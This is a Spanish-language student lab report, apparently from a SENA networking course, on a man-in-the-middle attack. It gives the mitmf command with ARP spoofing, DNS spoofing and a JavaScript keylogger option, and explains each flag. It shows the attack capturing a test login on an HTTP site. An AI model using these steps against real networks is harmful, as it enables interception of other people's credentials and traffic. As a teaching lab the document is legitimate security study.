7
ATAQUE DE SEGURIDAD INFORMATICA “MAN IN THE MIDDLE” Jorge Leonardo Ordoñez Rodríguez Ángel Mauricio Amador Mancipe Jean Michael Gómez Mesa SERVICIO NACIONAL DE APRENDIZAJE CENTRO DE ELECTRICIDAD, ELECTRONICA Y TELECOMUNICACIONES GESTION DE REDES DE DATOS 683561(6) REGIONAL DISTRITO CAPITAL

Man In The Middle

Embed Size (px)

DESCRIPTION

interrupción de la red por un tercero para ver el trafico.

Citation preview

Page 1: Man  In The Middle

ATAQUE DE SEGURIDAD INFORMATICA

“MAN IN THE MIDDLE”

Jorge Leonardo Ordoñez Rodríguez

Ángel Mauricio Amador Mancipe

Jean Michael Gómez Mesa

SERVICIO NACIONAL DE APRENDIZAJE

CENTRO DE ELECTRICIDAD, ELECTRONICA Y TELECOMUNICACIONES

GESTION DE REDES DE DATOS – 683561(6)

REGIONAL DISTRITO CAPITAL

Page 2: Man  In The Middle

Que es un ataque Man in the Middle o MiTM?

Conocido en español como hombre en el medio, es un ataque informático donde el

hacker o intruso, intercepta la comunicación entre dos partes de la red, bien sea

cliente-servidor o cliente-cliente como también servidor-servidor. Este ataque brinda la

posibilidad de leer, visualizar y hasta modificar los paquetes que se envían dos

elementos en la red.

Qué tipo de ataque MiTM se realizara?

En este laboratorio, se realizó un ataque MiTM utilizando la herramienta “mitmf” en la

distribución Kali Linux en su versión 1.1.0. Básicamente es una interceptación que

emula un servidor proxy entre el host y su respectivo router, este proxy captura los

datos y más exactamente lo que la víctima busca y teclea en su navegador, es un

keylogger online que funciona en la terminal de Linux y captura las búsquedas en la

web sin que la víctima lo detecte.

Como se realizó el laboratorio?

Se usó una maquina Asus N750JK con las siguientes características:

-Procesador Intel Core i7 4710HQ 2.5 Ghz Quadcore TurboBost 3.3 Ghz

-RAM 16Gb DDR3 1600Mhz

-Nvidia GeForce GTX 850M 4GB

- HDD 750Gb x 2

-Windows 7 Ultimate 64 Bits

En el Sistema base Windows, se instaló virtual box donde se emulo el Sistema

atacante Kali Linux. La víctima fue la maquina principal con el sistema Windows 7.

Page 3: Man  In The Middle

Comandos necesarios:

Para realizar el ataque tuvimos que actualizar el sistema Kali Linux con los siguientes

comandos en modo root:

#apt-get update && apt-get upgrade –fix-missing

Donde –fix-missing corrige errores de actualización.

Y luego procedimos a instalar el paquete “mitmf”

#apt-get install mitmf

La opción –fix-missing es posible si presenta errores.

Page 4: Man  In The Middle

Una vez instaladas las actualizaciones, realizamos el ataque, no sin antes tener claro

las direcciones IP de cada host, que en este caso serían:

Victima Windows 7: 192.168.0.6

Atacante KaliLinux: 192.168.0.9

Gateway (Router): 192.168.0.1

Ahora, teniendo claras las IP`s, y la distribución de Linux actualizada solo faltaba

empezar a atacar. Para eso usamos el comando “mitmf”

#mitmf –i eth0 –arp –dns –spoof –Gateway (Ip del Gateway) –target (IP victima) –

jskeylogger

Donde:

-i sirve para declarar la interfaz de salida

--arp Define el parámetro arp que hare que el router le entregue el paquete primero al

atacante ya que clona la MAC de la víctima.

--dns Este parámetro activa un servidor temporal o ficticio DNS sobre la maquina

--spoof Sirve para la clonación, en conjunto con –dns harán un copiado idéntico de las

paginas solicitadas por la víctima, pero son paginas infectadas o podríamos decir

vulneradas las cuales arrojaran los datos que el usuario ingrese ingenuamente.

-- Gateway es para definir el Gateway de la red donde se hace el ataque

--target aquí declaramos la IP de la victima

--jskeylogger parámetro que activa la captura de lo que se teclea y pasa a través del

servidor proxy ficticio.

Declaramos el comando

Page 5: Man  In The Middle

#mitmf –i eth0 –arp –dns –spoof –gateway 192.168.0.1 –target 192.168.0.6 –

jskeylogger

Y esperamos que cargue, para luego mostrar el tráfico y/o consultas de nuestra

victima

Entraremos a google y buscaremos la página ElTiempo.com

Y haremos un inicio de sesión ficticio para ver el resultado en la terminal de Linux:

Page 6: Man  In The Middle

Podemos evidenciar en la terminal como el atacante envía réplicas exactas pero

infectadas a la víctima de la página en consulta en google.

Ahora ingresaremos para ver como captura el usuario y la contraseña:

Y así como en esta página, se puede hacer en todas. Es un método muy efectivo,

rápido y fácil. Cabe resaltar que hay excepciones, paginas como Facebook, Hotmail,

Gmail, que funcionan haciendo uso obligatorio de HTTPS es imposible aplicar esta

técnica de hacking. La única forma seria que la víctima usara Internet Explorer como

navegador, y accediera por si sola a Facebook con http y no https como observamos a

continuación

Page 7: Man  In The Middle

Esto fue todo. Muchas Gracias por observar, y recuerda, el conocimiento es libre,

compártelo, menos a los niños rata, a esos no…

Para ver este tutorial siga este enlace:

https://www.youtube.com/watch?v=ggLpWKNIc4I&feature=youtu.be